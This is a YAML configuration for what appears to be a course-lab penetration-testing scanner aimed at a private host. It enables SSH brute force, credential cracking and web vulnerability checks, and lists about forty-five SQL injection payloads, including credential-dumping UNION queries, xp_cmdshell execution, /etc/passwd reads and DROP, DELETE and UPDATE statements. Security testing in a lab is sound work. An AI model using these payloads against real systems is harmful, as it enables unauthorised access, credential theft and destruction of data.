detected_ports: []
host: 192.168.1.100
port: 8080
tests:
  c_vulnerability_tests:
    enabled: true
  csrf:
    enabled: true
    new_password: new_secure_password123
  default_credentials:
    enabled: true
  directory_traversal:
    enabled: true
  file_upload:
    enabled: true
  js_php_vulnerability_tests:
    enabled: true
  md5_cracking:
    enabled: true
    hash_to_crack: 5f4dcc3b5aa765d61d8327deb882cf99
  smb_anonymous:
    enabled: true
  sqli:
    enabled: true
    payloads:
    - ''' OR 1=1 --'
    - ''' OR ''a''=''a'
    - ''' OR ''''='''
    - ''' OR 1=1#'
    - ''' OR ''x''=''x''--'
    - ''' AND 1=0 UNION SELECT NULL,NULL --'
    - ''' UNION SELECT 1,2,3--'
    - ''' AND 1=0 UNION SELECT table_name, column_name FROM information_schema.columns
      --'
    - ''' UNION SELECT username, password FROM users --'
    - ''' UNION SELECT 1, CONCAT(username, '':'', password) FROM users --'
    - ''' UNION SELECT NULL,NULL --'
    - ''' UNION SELECT 1,2--'
    - ''' UNION SELECT version(), database()--'
    - ''' UNION SELECT user(),password()--'
    - ''' UNION SELECT null,null,null--'
    - ''' UNION SELECT username,password FROM users--'
    - ''' AND ''a''=''a'' --'
    - ''' AND ''a''=''b'' --'
    - ''' AND 1=1 --'
    - ''' AND 1=2 --'
    - '''; SELECT IF(1=1, SLEEP(5), 0) --'
    - '''; SELECT pg_sleep(5); --'
    - ''' OR IF(1=1, SLEEP(5), 0) --'
    - ''' OR IF(1=2, SLEEP(5), 0) --'
    - ''' OR 1=1; EXEC xp_cmdshell(''ping 127.0.0.1'') --'
    - ''' AND load_file(''/etc/passwd'') --'
    - '''; DROP TABLE users; --'
    - '''; SELECT * FROM users; DROP TABLE users; --'
    - '''; INSERT INTO users (username, password) VALUES (''attacker'', ''password'')
      --'
    - ''' OR (SELECT COUNT(*) FROM users) > 0 --'
    - ''' OR EXISTS(SELECT * FROM users WHERE username=''admin'') --'
    - ''' OR 1=1 /*'
    - ''' OR 1=1 --'
    - '''; DROP TABLE users; --'
    - '''; SELECT version(); --'
    - '''; SELECT @@version, @@hostname; --'
    - '''; UPDATE users SET password=''newpass'' WHERE username=''admin''; --'
    - '''; DELETE FROM users WHERE username=''admin''; --'
    - '''%20OR%201=1 --'
    - ''' OR ASCII(SUBSTRING((SELECT database()),1,1))>64 --'
    - ''' OR 1=1--'
    - ''' OR ''1''=''1''--'
    - ''' OR ''1''=''1'' AND ''1''=''1''--'
    - '''%00 OR 1=1 --'
    - '''%00 OR ''1''=''1'' --'
  ssh_brute_force:
    enabled: true
    usernames:
    - root
    - admin
    - user
    - test
    - guest
    - CITS3006
    wordlist_file: ../../wordlist.txt
  weak_encryption:
    enabled: true
  xss:
    enabled: true
url: http://192.168.1.100
wordlist: ../../wordlist.txt
